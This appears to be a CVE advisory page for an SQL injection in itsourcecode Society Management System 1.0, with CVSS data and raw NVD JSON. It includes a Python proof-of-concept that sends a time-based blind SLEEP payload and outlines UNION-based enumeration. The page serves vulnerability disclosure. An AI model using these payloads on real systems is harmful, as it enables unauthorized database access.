Security Vulnerability Report
CVE-2026-1118 CVSS 6.3 MEDIUM

CVE-2026-1118

Published: 2026-01-18 11:15:49
Last Modified: 2026-04-29 01:00:02

Description

A vulnerability was detected in itsourcecode Society Management System 1.0. Impacted is an unknown function of the file /admin/add_activity.php. Performing a manipulation of the argument Title results in sql injection. It is possible to initiate the attack remotely. The exploit is now public and may be used.

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:angeljudesuarez:society_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE
itsourcecode Society Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2026-1118 SQL Injection PoC
# Target: itsourcecode Society Management System 1.0
# Endpoint: /admin/add_activity.php
# Vulnerable Parameter: Title

TARGET_URL = "http://target-site.com/admin/add_activity.php"


def exploit_sql_injection():
    """
    SQL Injection exploit for CVE-2026-1118
    This PoC demonstrates blind SQL injection in the Title parameter
    """
    # Basic authentication for low-privilege admin account
    auth = ('lowpriv_user', 'password')

    # SQL Injection payload - time-based blind check (SLEEP(5));
    # this request only measures a delay, it does not extract data itself
    payload = "'+(SELECT*FROM(SELECT(SLEEP(5)))a)+'"
    data = {
        'Title': payload,
        'Description': 'Test Activity',
        'Date': '2026-01-18',
        'submit': 'Add'
    }

    try:
        print(f"[*] Sending exploit request to {TARGET_URL}")
        print(f"[*] Payload: {payload}")
        response = requests.post(TARGET_URL, data=data, auth=auth, timeout=10)

        if response.elapsed.total_seconds() >= 5:
            print("[+] SQL Injection confirmed! Server response delayed by 5 seconds.")
            print("[+] Database version could be extracted using similar techniques.")
        else:
            print("[-] Exploit failed or target not vulnerable.")
    except requests.exceptions.Timeout:
        print("[+] SQL Injection confirmed! Request timed out as expected.")
    except Exception as e:
        print(f"[-] Error: {str(e)}")


def union_based_injection():
    """
    UNION-based SQL injection to extract database information
    (left as an outline in the original PoC; no request is sent)
    """
    # Determine number of columns (typically 1-10)
    for i in range(1, 11):
        payload = f"' UNION SELECT {','.join(['1'] * i)}-- "
        # Send request and analyze response
        print(f"[*] Testing {i} columns...")


if __name__ == "__main__":
    print("CVE-2026-1118 SQL Injection PoC")
    print("=" * 50)
    exploit_sql_injection()

References

https://github.com/AriazzzZ/CVE/issues/2 (Exploit, Issue Tracking, Mitigation, Third Party Advisory)
https://itsourcecode.com/ (Product)
https://vuldb.com/?ctiid.341710 (Permissions Required, VDB Entry)
https://vuldb.com/?id.341710 (Third Party Advisory, VDB Entry)
https://vuldb.com/?submit.734289 (Third Party Advisory, VDB Entry)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-1118",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-18T11:15:48.860",
    "lastModified": "2026-04-29T01:00:01.613",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A vulnerability was detected in itsourcecode Society Management System 1.0. Impacted is an unknown function of the file /admin/add_activity.php. Performing a manipulation of the argument Title results in sql injection. It is possible to initiate the attack remotely. The exploit is now public and may be used."
      },
      {
        "lang": "es",
        "value": "Se detectó una vulnerabilidad en itsourcecode Society Management System 1.0. Afectada es una función desconocida del archivo /admin/add_activity.php. Realizar una manipulación del argumento Title resulta en inyección SQL. Es posible iniciar el ataque de forma remota. El exploit ya es público y puede ser utilizado."
      }
    ],
    "metrics": {
      "cvssMetricV40": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "4.0",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
            "baseScore": 2.1,
            "baseSeverity": "LOW",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "vulnConfidentialityImpact": "LOW",
            "vulnIntegrityImpact": "LOW",
            "vulnAvailabilityImpact": "LOW",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "subAvailabilityImpact": "NONE",
            "exploitMaturity": "PROOF_OF_CONCEPT",
            "confidentialityRequirement": "NOT_DEFINED",
            "integrityRequirement": "NOT_DEFINED",
            "availabilityRequirement": "NOT_DEFINED",
            "modifiedAttackVector": "NOT_DEFINED",
            "modifiedAttackComplexity": "NOT_DEFINED",
            "modifiedAttackRequirements": "NOT_DEFINED",
            "modifiedPrivilegesRequired": "NOT_DEFINED",
            "modifiedUserInteraction": "NOT_DEFINED",
            "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
            "modifiedVulnIntegrityImpact": "NOT_DEFINED",
            "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
            "modifiedSubConfidentialityImpact": "NOT_DEFINED",
            "modifiedSubIntegrityImpact": "NOT_DEFINED",
            "modifiedSubAvailabilityImpact": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "valueDensity": "NOT_DEFINED",
            "vulnerabilityResponseEffort": "NOT_DEFINED",
            "providerUrgency": "NOT_DEFINED"
          }
        }
      ],
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
            "baseScore": 6.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.4
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      ],
      "cvssMetricV2": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "2.0",
            "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
            "baseScore": 6.5,
            "accessVector": "NETWORK",
            "accessComplexity": "LOW",
            "authentication": "SINGLE",
            "confidentialityImpact": "PARTIAL",
            "integrityImpact": "PARTIAL",
            "availabilityImpact": "PARTIAL"
          },
          "baseSeverity": "MEDIUM",
          "exploitabilityScore": 8.0,
          "impactScore": 6.4,
          "acInsufInfo": false,
          "obtainAllPrivilege": false,
          "obtainUserPrivilege": false,
          "obtainOtherPrivilege": false,
          "userInteractionRequired": false
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-74"},
          {"lang": "en", "value": "CWE-89"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:angeljudesuarez:society_management_system:1.0:*:*:*:*:*:*:*",
                "matchCriteriaId": "99B926B0-DB28-4E1F-8F49-489C73C35F36"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {"url": "https://github.com/AriazzzZ/CVE/issues/2", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Mitigation", "Third Party Advisory"]},
      {"url": "https://itsourcecode.com/", "source": "[email protected]", "tags": ["Product"]},
      {"url": "https://vuldb.com/?ctiid.341710", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]},
      {"url": "https://vuldb.com/?id.341710", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]},
      {"url": "https://vuldb.com/?submit.734289", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}
    ]
  }
}